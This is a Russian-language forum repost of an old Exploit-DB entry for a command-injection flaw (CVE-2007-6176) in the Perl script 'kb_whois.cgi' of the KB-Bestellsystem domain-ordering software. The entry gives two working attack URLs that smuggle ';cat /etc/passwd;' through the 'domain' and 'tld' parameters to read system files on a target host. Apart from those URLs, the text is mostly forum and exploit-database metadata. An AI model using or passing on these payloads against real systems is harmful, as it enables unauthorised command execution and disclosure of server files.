Exploit KB-Bestellsystem - 'kb_whois.cgi' Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4647
Проверка EDB
  1. Пройдено
Автор
ZERO X
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2007-6176
Дата публикации
2007-11-22
Код:
"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>

# milw0rm.com [2007-11-22]
 
Источник
www.exploit-db.com

Похожие темы